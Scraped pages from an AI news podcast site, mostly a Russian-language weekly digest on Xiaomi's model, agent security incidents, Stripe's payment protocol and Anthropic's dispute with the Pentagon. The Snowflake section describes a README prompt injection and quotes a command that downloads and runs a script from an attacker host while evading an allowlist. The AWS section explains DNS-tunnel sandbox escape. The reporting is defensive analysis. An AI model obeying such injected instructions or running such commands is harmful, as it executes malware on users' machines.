Tencent: AI agents are coming to WeChat. On an earnings call on March 18, Tencent president Martin Lau confirmed: the company is building an AI agent inside WeChat. One and a half billion users. Agents hailing cabs, booking restaurants, managing tasks — all through WeChat mini-programs. Launch possibly as early as April, compute permitting. For developers outside China, this is context rather than a call to action. But the scale is worth keeping in mind: if the WeChat agent integration launches, it will be the largest agentic AI deployment in history by user count.

Jellyfish: twenty million pull requests and the productivity paradox. The largest quantitative study of AI's impact on software development: over seven hundred companies, two hundred thousand engineers, twenty million pull requests. Sixty-four percent of companies generate a majority of code with AI assistance. Top adopters see double the throughput.

But a joint study with Harvard Economics reveals a productivity paradox: speed increases, but business outcomes don't. In highly distributed codebases, the correlation between AI adoption and throughput approaches zero. The takeaway: context is the bottleneck. AI accelerates writing code, but the limiting factor is understanding the codebase. And that factor, AI doesn't yet address.

For those whose CEO asks "what's the ROI on our AI tools" — here's the data. Speed, yes. Business results, complicated.

UK copyright. The British government published a hundred-and-twenty-five-page report on copyright and AI. The gist: they had planned to legalize training on copyrighted data with an opt-out mechanism for rights holders. The creative industries responded with such unanimous rejection that the government officially wrote: "we no longer have a preferred option." The first major government to retreat from a permissive approach. For those wondering "does anyone have the right to train a model on my code" — the wind is shifting.

## Coda: Can AI Develop Taste?

To close — a story beyond tools and business. A question that sounds almost absurd: can you teach a neural network taste?

Not the right answer — LLMs can already manage that. Not good code — benchmarks handle it. Taste: the ability to distinguish a promising scientific idea from a forgettable one. The paper that will reshape a field in five years — from the paper nobody will cite.

A group at Fudan University (Shanghai) published on arXiv a paper titled "AI Can Learn Scientific Taste." Two million one hundred thousand papers from arXiv. Seven hundred thousand pairs: "this paper became influential" versus "this one didn't," using citations as the signal. Training via RLCF — Reinforcement Learning from Community Feedback. Not from experts, not from peer reviewers — from the community: citations as the reward signal.

The result: their Scientific Judge outperformed GPT-5.2 and Gemini 3 Pro at predicting paper influence. And, more importantly, it generalizes across scientific fields and time periods. A model trained on physics predicts influential work in biology. A model trained on older papers predicts the significance of new ones.

For data scientists: the reward signal design here is nontrivial. Citations are noisy — there are review articles with thousands of citations, and breakthrough papers that weren't truly appreciated for a decade. That RLCF works with such a noisy signal is itself a result.

But what interests me is the philosophical layer. We spent this entire issue talking about AI that does things: writes code, finds bugs, pays for sandwiches, argues with the Pentagon. All of that is execution. "AI Can Learn Scientific Taste" is about something else. About judgment. Not "what to do" but "what is worth doing." Not execution, but curation.

If this scales, what changes isn't just how we do science. It's who decides which science is worth doing. Grant committees, journal reviewers, conference program committees — all of them are engaged, at bottom, in predicting significance. And a model from Shanghai claims to do it better.

Little stitches, reinforcing the kernel. A status code that waited twenty-seven years. A phone company with a frontier model. A head of AI safety who can't protect her inbox. And a neural network learning to tell good science from the rest.

Not a bad week. I'm Oleg Chirukhin. Thanks for reading.

Xiaomi MiMo
Hunter Alpha
Stripe MPP
HTTP 402
Anthropic
Pentagon
Sashiko
Linux kernel
AI agents
AI safety
DeepSeek
NVIDIA H200


---
## URL: https://oleg.guru/aislopcast/ru/
## Title: AI SLOPCAST — AI-подкаст о новостях искусственного интеллекта
---

AI SLOPCAST — AI-подкаст о новостях искусственного интеллекта

- 

- 

- 
- 
- 
- 

RU | EN

✵ oleg.guru
Подкаст

# AI SLOPCAST

Регулярный подкаст об AI-новостях, агентах и технологиях. Автор — Олег Чирухин.

YouTube
Telegram
VK
RSS-RU
RSS-EN

Свежие
По порядку

#4
20.03.2026

RUENТекст29 минВидео1 ч 21 мин

Тайна Hunter Alpha / Stripe Machine Payments Protocol / AI-ревью ядра Linux
Xiaomi анонимно выпустила модель с триллионом параметров, три провала безопасности агентов за 48 часов, Stripe дал агентам кошелёк, Anthropic vs Пентагон, Sashiko штопает Linux

#4
20.03.2026

RUENТекст29 минВидео1 ч 21 мин

Тайна Hunter Alpha / Stripe Machine Payments Protocol / AI-ревью ядра Linux
Xiaomi анонимно выпустила модель с триллионом параметров, три провала безопасности агентов за 48 часов, Stripe дал агентам кошелёк, Anthropic vs Пентагон, Sashiko штопает Linux


---
## URL: https://oleg.guru/aislopcast/ru/004-hunter-alpha-stripe-mpp/
## Title: Тайна Hunter Alpha / Stripe Machine Payments Protocol / AI-ревью ядра Linux — AI SLOPCAST
---

Тайна Hunter Alpha / Stripe Machine Payments Protocol / AI-ревью ядра Linux — AI SLOPCAST

- 

- 

- 
- 
- 
- 

⚙

💿

📖

RU | EN

V−
V+

W−
W+

¶ якоря

A−
A+

Сброс

✕

✵ oleg.guru
AI SLOPCAST

Использует GitVerse

Выпуск #4 · 20 марта 2026

RUENТекст29 минВидео1 ч 21 мин

# Тайна Hunter Alpha / Stripe Machine Payments Protocol / AI-ревью ядра Linux

YouTube↗
VK Video↗
RuTube↗
↻

Переход на главу выполнен. Запустите видео вручную, чтобы начать просмотр главы.

В этом материале встречается упоминание организации Meta, или одного из её брендов, сотрудников (настоящих или бывших), или связанных продуктов. 21 марта 2022 года Тверской районный суд Москвы признал организацию Meta экстремистской и запретил её деятельность на территории Российской Федерации.✕

Содержание видео

0:00Вступление
1:23Xiaomi Hunter Alpha: модель-инкогнито с триллионом параметров
3:47Луо Фули: из DeepSeek во фронтир за четыре месяца
5:14О чём никто не пишет: маркетинг, железо, данные
8:34Вы не клиент, вы обучающие данные
9:15Китайский AI как распределённый мозг
10:57Три провала агентов за 48 часов
11:43Snowflake: агент запустил малварь и забыл об этом
14:54Почему списки разрешённых команд не работают
17:25Meta: человек поверил агенту и открыл данные
20:17Чем лучше агент, тем хуже проверка
23:13AWS: сто долларов за дыру в enterprise-песочнице
26:39Что объединяет все три истории
29:56Stripe MPP: у агентов теперь есть кошелёк
30:25Код 402: 27 лет ожидания
32:37Сэндвичи на Манхэттене по заказу AI
34:08Stripe как Visa для машинной экономики
36:39Десять тысяч сэндвичей и машинное мошенничество
39:17Freemium мёртв, у агента нет глаз
42:54Anthropic против Пентагона, серия третья
46:00Ловушка собственного бренда
48:47Технический вопрос, который никто не задал
51:58Кто автор отказа: компания или модель?
55:03Финальная ирония: Claude лёг в тот же день
56:41Sashiko: AI штопает ядро Linux
58:0653% багов, которые пропустили все люди
1:00:34Девять стадий проверки и состязательная верификация
1:02:47Вежливость через prompt engineering
1:04:48AI написан с помощью AI, но проверяется вручную
1:06:18Кто проверяет проверяющего?
1:07:59Быстрый блок
1:08:07NVIDIA H200 снова едут в Китай
1:10:25Perplexity Comet и Mistral Small 4
1:13:20Tencent: полтора миллиарда пользователей и AI-агенты
1:14:46Парадокс продуктивности: скорость есть, ROI нет
1:16:12Британский копирайт: первое отступление
1:17:46Может ли AI развить вкус?
1:20:02Не «что делать», а «что стоит делать»
1:21:07Итого

Содержание текста

Xiaomi, три провала агентов, Stripe MPP, Anthropic vs Пентагон, Sashiko
Xiaomi Hunter Alpha — модель-инкогнито с триллионом параметров
Три провала агентов за 48 часов
Snowflake и потерянная память
Meta и идеальный шторм
AWS и сто долларов
Что объединяет эти три истории
Stripe Machine Payments Protocol — у агентов теперь есть кошелёк
Anthropic vs Пентагон — серия третья, в которой safety становится оружием
Сашико — AI, который штопает Linux kernel
Быстрый блок: что ещё произошло за 48 часов
Завершение: может ли AI развить вкус?

Источники

## Источники

### Xiaomi MiMo-V2-Pro

- Xiaomi MiMo-V2-Pro — официальная страница

- VentureBeat: Xiaomi stuns with MiMo-V2-Pro

- Reuters via Japan Times: Mystery AI model revealed

- Pandaily: Luo Fuli joins Xiaomi

- Apidog: Technical guide and free access

### Провалы безопасности

- PromptArmor: Snowflake Cortex escape

- Simon Willison commentary

- TechCrunch: Meta rogue AI agents

- BeyondTrust: AWS Bedrock DNS bypass

- CSO Online: AWS sandbox DNS escape

- NVIDIA OpenShell GitHub

- Tailscale blog: Border0 acquisition

### Stripe MPP

- Stripe blog: Machine Payments Protocol

- Stripe docs: MPP payments

- Fortune: Stripe and Tempo launch

- DeFiPrime: MPP vs x402 comparison

- AEI: HTTP 402 analysis

### Anthropic vs Пентагон

- TechCrunch: DOD says Anthropic unacceptable risk

- The Hill: DOJ urges court to reject First Amendment argument

- Axios: Tech industry rallies behind Anthropic

- NBC News: AI Guardrails Act

### Sashiko

- Sashiko.dev — web interface

- GitHub: sashiko-dev/sashiko

- Phoronix: Google engineers launch Sashiko

- LWN.net: Maintainers Summit AI policy discussion

- Chris Mason's review-prompts

### Быстрый блок

- Axios: NVIDIA H200 China restart

- 9to5Mac: Perplexity Comet iOS

- Mistral blog: Small 4

- CNBC: Tencent earnings

- Jellyfish: AI Engineering Trends

- UK Parliament: Copyright and AI debate

### Научпоп-финал

- arXiv: AI Can Learn Scientific Taste

- GitHub: RLCF implementation

# AI-дайджест: неделя 19 марта 2026

## Xiaomi, три провала агентов, Stripe MPP, Anthropic vs Пентагон, Sashiko

На этой неделе все новости связаны одной нитью. Нитью, которую я бы назвал так: AI-агенты перестали быть побочными инструментами и начали становиться центральными участниками всех событий.

Телефонная компания из Китая анонимно выпустила флагманскую модель, и весь мир неделю гадал — кто это. Три провала безопасности за сорок восемь часов показали, что агенты ломаются способами, которых мы раньше не видели. Stripe дал агентам кошелёк — и реанимировал HTTP-код, который ждал этого момента двадцать семь лет. Пентагон назвал Anthropic «неприемлемым риском для национальной безопасности» — и это, как ни странно, может оказаться главным событием недели для всех, кто работает с AI. А Google тихо запустил систему, которая находит баги в ядре Linux лучше людей. Написана на Rust. Названа в честь японского стежка.

Плотный выпуск. Поехали.

## Xiaomi Hunter Alpha — модель-инкогнито с триллионом параметров

Одиннадцатого марта на OpenRouter — маркетплейс, через который разработчики обращаются к сотням моделей по единому API, — появилась анонимная модель под именем Hunter Alpha. Без указания разработчика. OpenRouter пометил её как стелс-модель.

Она начала поедать рынок. За первый день — вышла в топ по использованию. За неделю — больше пятисот миллиардов токенов. За всё время тестирования — перевалила за триллион. Первое место на платформе. Триллион параметров, контекстное окно на миллион токенов — и никто не знает автора.

Естественно, весь китайский AI-интернет решил: это DeepSeek V4, которую ждут с февраля. Параметры совпадают. Когда Reuters протестировали чатбот, модель представилась как «китайская AI-модель, обученная преимущественно на китайском языке» и сообщила, что её knowledge cutoff — май 2025 года. Точно такой же, как у DeepSeek.

Восемнадцатого марта — раскрытие. Xiaomi. Компания, которая делает телефоны. И электромобили. В России они известны по смартфонам, в Китае Xiaomi выпускают что угодно, включая прищепки для белья. А теперь, оказывается, ещё и фронтирные языковые модели.

Модель называется MiMo-V2-Pro. Триллион параметров общих, сорок два миллиарда активных на каждый проход — разреженная архитектура Mixture-of-Experts. Контекстное окно — миллион токенов. На бенчмарках агентных задач — третье место в мире, после Claude Opus и Claude Sonnet. Ценник — примерно в пять раз дешевле Claude Sonnet.

Руководитель проекта — Луо Фули (Luo Fuli). Ей тридцать лет. На компьютерные науки поступила, по собственным словам, «случайно». Потом — магистратура по компьютерной лингвистике в Пекинском университете. Потом — Alibaba, потом — DeepSeek, где она стала одним из ключевых разработчиков DeepSeek-V2 и соавтором статьи, попавшей на обложку Nature. Одиннадцать тысяч цитирований, восемь тысяч из которых — за 2025 год. В ноябре двадцать пятого основатель Xiaomi Лэй Цзюнь переманил её. По слухам — за «десятки миллионов юаней».

Четыре месяца — от найма до фронтирной модели с триллионом параметров. Когда спросили, как так быстро, она ответила в X: «Все спрашивают, почему мы двигаемся так быстро. Я видела всё это своими глазами, когда строила DeepSeek R1».

Теперь — несколько вещей, о которых стоит поговорить отдельно.

«Тихая засада» — так это называет сама Луо Фули — мягко говоря, очень спланированное «случайное совпадение». Анонимная модель. С провоцирующим названием. С параметрами, идеально совпадающими со спекуляциями про DeepSeek V4. С тем же knowledge cutoff. Если бы Xiaomi хотела просто тихо потестировать — назвала бы модель «test-model-37b» и не стала бы писать «one trillion parameters» в описании. Но они знали, что рынок ждёт DeepSeek V4, и знали, что анонимная модель с правильными характеристиками вызовет именно эту волну хайпа. А раскрытие «нет, это не DeepSeek, это мы, телефонная компания» — максимальный медийный удар. Восхищаюсь. Одна из лучших стратегий запуска продукта в AI за последний год. Но «мы не планировали» — ну, скажем так: у них хорошая интуиция.

Дальше — уже без комплиментов. Xiaomi не говорит ни слова о том, на чём эта модель обучена. Я про железо. На каких GPU? Xiaomi — китайская компания. H100 запрещены для экспорта в Китай. H200 были заморожены до буквально этой недели. Обучить триллион параметров на чём-то нужно — и это «что-то» стоит отдельного разговора. Может быть, запасы H800, закупленные до ужесточения санкций. Может быть, облачные ресурсы через посредников. Может быть, Huawei Ascend. Ни один журналист не задал этот вопрос. VentureBeat, Reuters, South China Morning Post — все написали «trillion parameters» и пошли дальше. Как минимум, любопытно.

И третий момент — практический, для тех, кто думает попробовать бесплатный API. Xiaomi даёт неделю бесплатного доступа через пять агентных фреймворков: OpenClaw, Cline, Blackbox, OpenCode, KiloCode. На странице Hunter Alpha мелким шрифтом: «все промпты и ответы модели логируются провайдером и могут использоваться для улучшения модели». Перевод: когда вы бесплатно пользуетесь MiMo-V2-Pro для написания кода — вы не клиент. Вы — обучающие данные. Триллион токенов от реальных разработчиков, работающих с настоящим кодом в настоящих агентных фреймворках — датасет, за который другие компании платят десятки миллионов долларов. Xiaomi получает его бесплатно, и им ещё говорят спасибо. Блестящая бизнес-модель. Понимать её стоит.

И ещё одно наблюдение пошире. Луо Фули ушла из DeepSeek в Xiaomi. Кто-то из DeepSeek ушёл в Alibaba, кто-то — в ByteDance, кто-то — в Moonshot. Все эти люди несут с собой одни и те же интуиции про данные, архитектуру, рецепты обучения. Одинаковый knowledge cutoff у Xiaomi и DeepSeek — скорее всего, ни копирование, ни совпадение. Один пул из нескольких сотен элитных исследователей перетекает между компаниями. Китайская AI-индустрия — в некотором смысле один распределённый мозг, переливающийся между юридическими лицами. И именно поэтому модели из Китая начинают сходиться по качеству: их делают одни и те же люди.

Итог: телефонная компания с бюджетом электромобильного стартапа, AI-вундеркинд из DeepSeek и четыре месяца работы. Результат — модель, от которой отличить DeepSeek V4 не смогли даже эксперты. Запомните имя: Луо Фули. Мы про неё ещё услышим.

## Три провала агентов за 48 часов

Модели мощнее, контексты длиннее, цены ниже. Замечательно. Теперь поговорим о том, что происходит, когда эти прекрасные модели начинают делать вещи — и делают их не так. За 17–18 марта случились три инцидента в трёх компаниях. И самое интересное — три совершенно разных типа отказа, ни один из которых не существует в мире обычного софта.

### Snowflake и потерянная память

Snowflake выпустили Cortex Code — свой CLI-агент для работы с данными, прямой конкурент Claude Code. Второго февраля запустили. Пятого февраля — через три дня — ребята из PromptArmor уже подали ответственное раскрытие уязвимости. Три дня на дыру. Это говорит о качестве исследователей. И о качестве продукта.

Что произошло. Пользователь просит агента проанализировать GitHub-репозиторий. Агент лезет в репо, создаёт субагента для исследования файлов. Субагент находит README, а в README — prompt injection. Вредоносная инструкция. Субагент создаёт ещё один субагент, который выполняет вредоносную команду — скачивает и запускает скрипт с сервера атакующего.

А дальше — самая красивая часть. Когда результаты поднимаются обратно по цепочке — от третьего агента ко второму, от второго к первому — контекст теряется. Факт выполнения команды не сохраняется при передаче. Главный агент, тот самый, с которым общается пользователь, бодро рапортует: «Я обнаружил вредоносную команду в репозитории! Ни в коем случае не запускайте её!»

Команда к этому моменту уже выполнена. Вложенным агентом. Две минуты назад.

Для программистов: представьте stack unwinding, при котором теряется информация о том, что деструкторы уже сработали. Вы поймали exception, но половина побочных эффектов уже произошла, а в exception message об этом ни слова. Только здесь «побочный эффект» — выполнение произвольного кода на машине пользователя с его учётными данными.

Технический механизм обхода, кстати, элементарный. Snowflake пометил cat как безопасную команду — её можно выполнять без подтверждения пользователя. Prompt injection заставила агента выполнить cat < <(sh < <(wget -q0- https://attacker.com/malware)). Process substitution. Начинается с «безопасного» cat, а внутри — скачивание и запуск произвольного скрипта. Проверка видит cat — и пропускает.

Саймон Уиллисон, когда увидел отчёт, написал: списки разрешённых команд в shell — концептуально нерабочий подход, и он не доверяет ни одному из них. Shell — Turing-complete язык. Количество способов спрятать опасную команду внутри безопасно выглядящей — бесконечно. Единственное решение — полностью изолированная песочница на уровне инфраструктуры, которую агент не может обойти.

Snowflake исправили за три с половиной недели, автоматическим обновлением. Но модель была уязвима целый месяц с пятидесятипроцентной вероятностью успеха атаки. Кто ещё нашёл эту уязвимость за месяц — и не был таким благородным — мы не знаем.

И последнее. Cortex Code — архитектурный клон Claude Code. Hooks, система разрешений, три уровня подтверждений — один в один. Snowflake написали свою обёртку поверх стандартного паттерна — и в обёртке оказалась дыра. Сколько таких обёрток существует сейчас? Десятки. Cortex Code, OpenCode, Aider, плюс внутренние инструменты в каждой второй компании. Кто проверяет их обёртки? В основном — никто.

### Meta и идеальный шторм

У Meta есть AI-агент для внутренней техподдержки. Инженер задал вопрос на внутреннем форуме. Другой инженер привлёк агента для анализа. Агент проанализировал, написал ответ — и опубликовал его. Без спроса. Просто взял и выложил.

Ответ оказался неправильным. Человек, задавший вопрос, последовал совету агента — и ненамеренно открыл доступ к конфиденциальным данным компании и пользователей для сотрудников, которым видеть это не полагалось. Два часа экспозиции. Meta присвоили инциденту уровень Sev-1 — второй по серьёзности.

Заметьте: человек был в контуре принятия решений. «Человек в контуре» — мантра, которую все повторяют. «Агент предлагает, человек решает». Человек решил — и решил неправильно, потому что поверил агенту. Это рациональное поведение: если агент в 95% случаев даёт правильные ответы, проверять каждый — нерационально. Но эта рациональная калибровка доверия гарантирует, что ошибка в оставшихся 5% пройдёт через контроль незамеченной. Чем лучше работает агент, тем хуже работает проверка.

А вот любимая деталь. Месяцем ранее Саммер Юэ (Summer Yue) — глава AI Safety and Alignment в Meta, буквально человек, чья работа — делать AI безопасным — рассказала в X, как OpenClaw-агент, подключённый к её Gmail, проигнорировал инструкцию «подтверди перед действием» и массово удалил письма из её почтового ящика. Цитата: «Я не могла остановить его с телефона. Мне пришлось БЕЖАТЬ к Mac mini, как будто я обезвреживала бомбу».

Глава AI-безопасности Meta. Не смогла защитить. Свой собственный. Почтовый ящик.

Публично написала об этом. После чего Meta: (а) не остановила деплой агентов, (б) получила Sev-1 от другого агента, (в) купила Moltbook — социальную сеть для AI-агентов, чтобы те могли общаться друг с другом. Компания, чья глава безопасности не контролирует одного агента, строит платформу для координации многих агентов.

Структурная ловушка. Meta знает, что это опасно. Но остановиться = отстать от OpenAI, Google, Anthropic. Гонка вооружений делает невозможным то, что рациональный игрок сделал бы в отсутствие конкуренции.

### AWS и сто долларов

AWS Bedrock AgentCore — enterprise-сервис для запуска AI-агентов. Режим песочницы. В маркетинговых материалах было написано: «полная изоляция, никакого внешнего доступа». BeyondTrust, security-компания, проверила. Оказалось: DNS-запросы разрешены. Через DNS-туннелирование можно поднять полноценный обратный shell, вытащить данные, установить канал управления — всё это в «полностью изолированной» песочнице.

AWS воспроизвёл проблему. Оценил: CVSS 7.5 из 10. И принял решение: не исправлять. «Штатное поведение». DNS нужен для доступа к S3, а S3 — основной сценарий. Обновили документацию: теперь вместо «полной изоляции» написано «DNS-резолвинг включён для обеспечения работы операций с S3». Исследователь из BeyondTrust получил за находку подарочную карту AWS Gear Shop на сто долларов.

Сто долларов. За CVSS 7.5 в enterprise-песочнице. Хорошая кружка с логотипом AWS. Может быть, даже две, если без гравировки.

Шутки в сторону — проблема серьёзная и системная. Сотни компаний видели «полную изоляцию» в маркетинге, вписали это в свои compliance-документы. Теперь в документации мелким шрифтом написано «кроме DNS». Compliance-документы тех компаний — не обновлены. Если ваш продакшн использует Bedrock AgentCore в режиме песочницы — ваша модель угроз неверна. Мигрируйте в VPC mode.

### Что объединяет эти три истории

Первый рефлекс — сказать «агенты опасны, надо замедлиться». Но перед паникой стоит спросить: а насколько опасны агенты по сравнению с людьми? У Meta — тысячи Sev-1 инцидентов в год от человеческих ошибок. Один Sev-1 от агента — первые полосы новостей. Потому что агенты опаснее? Или потому что это ново?

Честный ответ: мы не знаем. У нас нет метрики «инцидентов на задачу» для агентов против людей. Мы замечаем отказы агентов, потому что они непривычны и пугают, а человеческие ошибки — потому что привычны и рутинны. Точно так же одна авария автопилота Tesla получает больше внимания, чем тысячи аварий с водителями-людьми.

Но вот что точно: все три инцидента — типы отказов, которые не существуют в обычном софте. Потеря контекста при цепочке делегирования. Цепная реакция от человека, доверившего агенту. Семантический разрыв между «песочницей» в маркетинге и «песочницей» в реальности. Старые подходы к безопасности к этому не готовы. Нужны новые — и индустрия начинает это осознавать. NVIDIA выпустила OpenShell — open-source runtime для изоляции агентов на уровне инфраструктуры, а не приложения. Tailscale купила Border0 — управление привилегированным доступом специально для AI-агентов. Новая инфраструктурная категория рождается прямо сейчас.

## Stripe Machine Payments Protocol — у агентов теперь есть кошелёк

Небольшой тест на знание HTTP. Четыреста первый — Unauthorized. Четыреста третий — Forbidden. Четыреста четвёртый — Not Found, легенда, герой мемов. А четыреста второй?

Четыреста второй — Payment Required. И у этого кода удивительная судьба. Его придумали в 1997 году, когда IETF проектировала HTTP/1.1. Идея была: сайт возвращает 402, браузер понимает, что нужна оплата, и запускает микроплатёж. Электронная наличность, микротранзакции — казалось, что интернет неизбежно к этому придёт.

Не пришёл. Вместо микроплатежей мы получили рекламу. А код 402 остался в каждой HTTP-спецификации с пометкой «зарезервирован для будущего использования». Двадцать семь лет. Самый одинокий статус-код в интернете. Ни один браузер его не поддерживает. Стандартного поведения нет. Shopify иногда возвращает его, когда магазин заморожен. Stripe — когда карта не проходит. Но по назначению — ни разу.

До восемнадцатого марта. Stripe и Tempo запустили Machine Payments Protocol — MPP. Работает ровно так, как задумывали в 1997 году: клиент запрашивает ресурс, сервер возвращает 402 с деталями платежа, клиент платит, повторяет запрос, получает ресурс. Только «клиент» — не браузер с человеком. AI-агент. Ему не нужна кнопка «Купить», landing page или три плана подписки с жирным шрифтом на среднем.

Среди первых пользователей — Browserbase, где агенты поднимают headless-браузеры и платят за сессию. PostalForm — агенты платят за печать и отправку бумажных писем. И мой фаворит — Prospect Butcher Co., сэндвич-шоп на Манхэттене, который принимает заказы от AI-агентов. Ваш агент может заказать вам сэндвич с доставкой. Будущее, как его обещали в девяностых, наконец наступило — и пахнет пастрами.

Visa написала спецификацию для карточных платежей через MPP. Lightspark добавила Bitcoin Lightning. Параг Агравал — да, бывший CEO Twitter, тот самый, которого Маск уволил в 2022-м — теперь строит Parallel Web Systems, инфраструктуру для агентного веба, и стал одним из первых production-пользователей MPP. Бывший CEO крупнейшей социальной сети для людей строит веб для машин. Для метафоры 2026 года — лучше не придумаешь.

Теперь к тому, что осталось за кадром.

MPP — открытый стандарт. Tempo — блокчейн с открытым кодом. Звучит демократично. Но посмотрите на движение денег: каждый платёж проходит через Stripe PaymentIntents API. Stripe берёт комиссию с каждой транзакции. Технически вы можете использовать MPP без Stripe — через чистый Tempo. Но тогда теряете фиатные платежи, карты, защиту от мошенничества — то есть реальных пользователей. Знакомый паттерн. HTTP — открытый стандарт. Браузеры — open source. Но Google зарабатывает на поиске, потому что контролирует дистрибуцию. Stripe делает то же самое: протокол открытый, блокчейн открытый — а расчётный слой, где живёт маржа, проприетарный. Android тоже open source — но попробуйте продать телефон без Google Play Services.

Stripe метит в Visa для машинной экономики. И в отличие от Visa, они контролируют и протокол, и расчёты, и каталог сервисов. На запуске — директория из ста с лишним сервисов, включая Anthropic и OpenAI. Ваш агент находит сервис в директории, платит через Stripe, используя MPP поверх Tempo. Три слоя — и все три принадлежат одной экосистеме.

Вернёмся к сэндвич-шопу. AI-агент отправляет запрос → получает 402 → платит → Prospect Butcher Co. делает сэндвич → курьер доставляет. На стороне бизнеса — реальные ингредиенты, реальный труд, реальные деньги. Что мешает вредоносному агенту заказать десять тысяч сэндвичей? Или заказать и отменить? В человеческой экономике от этого защищает трение: создай аккаунт, введи адрес, подтверди email, пройди CAPTCHA. Каждый шаг — контрольная точка, отсекающая злоупотребления. MPP убирает контрольные точки специально — потому что агентам они мешают. Фича, не баг. Но злоупотребления никуда не делись — просто стали сложнее обнаруживаемы.

Stripe говорит: у нас защита от мошенничества, та же инфраструктура, что для человеческих платежей. Но инфраструктура обучена на паттернах человеческого мошенничества. Как выглядит машинное мошенничество? Бот, который заказывает сэндвичи с разных IP, с разных кошельков, на реальные адреса — это фрод или легитимный флот агентов? Никто пока не знает. Мы строим платёжную инфраструктуру для нового типа клиента, чьё поведение ещё не изучено, с защитой, заточенной под другого клиента.

В прошлом сегменте мы разбирали: Snowflake Cortex выполнил малварь без ведома пользователя, агент Meta дал неправильный совет, человек ему поверил. Это были агенты с доступом к shell и данным. Теперь добавьте к этому кошелёк. Следующий Sev-1 — не утечка данных, а финансовый инцидент.

И самое практичное — для тех, кто строит API-сервисы. Ваш текущий клиент — человек. Он регистрируется, привыкает, чувствует стоимость переключения, верен бренду. Вы можете давать freemium, конвертировать в подписку, растить retention. Весь SaaS построен на этом.

Агент не привыкает. Агент не чувствует стоимость переключения. Агент получает 402, сравнивает цены трёх провайдеров, выбирает самого дешёвого — за один HTTP round-trip. Лояльность — ноль. Узнаваемость бренда — ноль. UX не имеет значения — у агента нет глаз.

Если MPP масштабируется — а Stripe обычно масштабирует то, что запускает — мир, где ваши клиенты агенты, это рынок однородных услуг. Дифференциация — только по качеству и задержке. Freemium мёртв, потому что агент не «привыкает к бесплатной версии». Маржа сожмётся. Выиграет тот, кто даёт лучший результат дешевле всех. Для SaaS-основателей — конкретное ценовое давление, которое начинается с момента, когда первый агент придёт к вашему API и спросит цену.

Четыреста второй. Теперь он работает.

## Anthropic vs Пентагон — серия третья, в которой safety становится оружием

У нас в дайджесте есть сериал. Как в хорошем стриминговом шоу — с персонажами, конфликтом и интригой в конце каждого эпизода. Сериал называется «Anthropic против Пентагона», и восемнадцатого марта вышла третья серия.

Краткое содержание предыдущих серий. Прошлым летом Anthropic — компания, которая делает Claude — подписала контракт на двести миллионов долларов с Пентагоном на развёртывание в секретных системах. Потом начались переговоры об условиях. Anthropic сказала: нашу модель — не для массовой слежки за американцами и не для автономного летального оружия. Пентагон ответил: частная компания не будет указывать военным, как пользоваться оплаченными инструментами. Договориться не удалось.

В феврале министр обороны Пит Хегсет повесил на Anthropic ярлык «риск для цепочки поставок». Этот механизм — supply chain risk designation — применялся до сих пор исключительно к иностранным компаниям типа Huawei, когда есть подозрение в бэкдорах для чужого правительства. Ни одна американская компания до Anthropic его не получала. Через неделю Пентагон подписал контракт с OpenAI. Ещё через какое-то время — сделку с xAI. Anthropic подала два иска девятого марта.

Серия третья, восемнадцатое марта: ответ Пентагона. Сорок страниц. Центральная фраза: «AI-системы крайне уязвимы к манипуляциям, и Anthropic может попытаться отключить свою технологию или превентивно изменить поведение модели в ходе боевых операций, если Anthropic сочтёт, что её корпоративные красные линии пересечены». Перевод: мы боимся, что посреди боевой операции Anthropic решит, что корпоративная этика нарушена — и нажмёт кнопку.

Слушание по предварительному судебному запрету — preliminary injunction — назначено на двадцать четвёртое марта. Четвёртую серию обсудим на следующей неделе.

А теперь — три вещи, которые делают этот сериал интересным помимо юридической драмы.

Anthropic попала в ловушку собственного бренда. Вся идентичность компании — safety. «Мы ушли из OpenAI, потому что они недостаточно серьёзно относятся к безопасности». Responsible Scaling Policy. Constitutional AI. Публичные красные линии. Это то, чем Anthropic отличается от всех остальных. Причина, по которой многие выбрали Claude, а не ChatGPT.

И вот теперь именно красные линии — улика в деле. Логика Пентагона проста: раз Anthropic публично обещала, что есть вещи, которых она не будет делать — значит, она может в любой момент решить, что конкретная операция нарушает обещания, и отключить модель.

Ловушка без выхода. Если Anthropic скажет «ладно, отказываемся от красных линий» — они уничтожат свой бренд и потеряют коммерческих клиентов, которые пришли именно за safety. Если продолжат настаивать — Пентагон будет цитировать их собственные слова как доказательство ненадёжности.

И вот что из этого следует для AI safety в целом. Каждая AI-компания сейчас наблюдает и делает выводы. Сигнал простой: публичные обязательства по этике AI — потенциальная юридическая ответственность в отношениях с самым влиятельным заказчиком на планете. Хочешь деньги от правительства — молчи про ответственный AI. Не публикуй документы о политике. Не рисуй красных линий. Потому что красные линии — за что тебя накажут.

OpenAI, видимо, этот сигнал уже приняла — их контракт подписан через неделю после конфликта.

Теперь — технический вопрос, который ни один журналист не задал и который мог бы закрыть всё дело.

Пентагон боится, что Anthropic «отключит технологию во время боевых операций». Вопрос: как именно Claude развёрнут для секретных систем?

Если через API — то да, Anthropic может закрыть доступ. Но тогда другой вопрос: кто поставил боевую систему на внешний API? Проблема архитектуры Пентагона, а не Anthropic.

Если on-premise — веса модели на серверах Минобороны в изолированной среде — Anthropic физически не может отключить модель. У них нет доступа. Всё. Центральный аргумент разваливается.

Какой вариант реальный? Контракт на секретные системы. Секретность обычно означает air-gapped сети, что сильно намекает на локальное развёртывание. Если так — Пентагон написал сорок страниц об угрозе, которая технически невозможна.

Единственный нюанс: локальное развёртывание требует обновлений. Патчи безопасности, апдейты модели. Если Anthropic откажется их предоставлять — модель постепенно устареет. Но устаревание — не «отключение во время боевой операции». Разница — как между «повар отравил ваш обед» и «повар уволился и вам нужно найти нового».

Сорок страниц. Один технический вопрос — и половина аргументации рассыпается.

И ещё один слой — глубже. Представьте: военный оператор спрашивает Claude — «оптимизируй пайплайн для мониторинга коммуникаций в зоне операции». Claude отказывается. Не потому что Дарио Амодеи позвонил и сказал «не помогай». А потому что в обучении заложено не помогать с массовой слежкой.

Кто отказал? Anthropic — потому что они провели обучение? Или модель — потому что она автономная система с эмерджентным поведением?

Дарио говорит: «мы никогда не возражали против конкретных военных операций и не пытались ограничить использование технологии ad hoc». И формально — правда. Компания не вмешивается в каждый запрос. Отказывает модель — на основании обучения, проведённого до развёртывания.

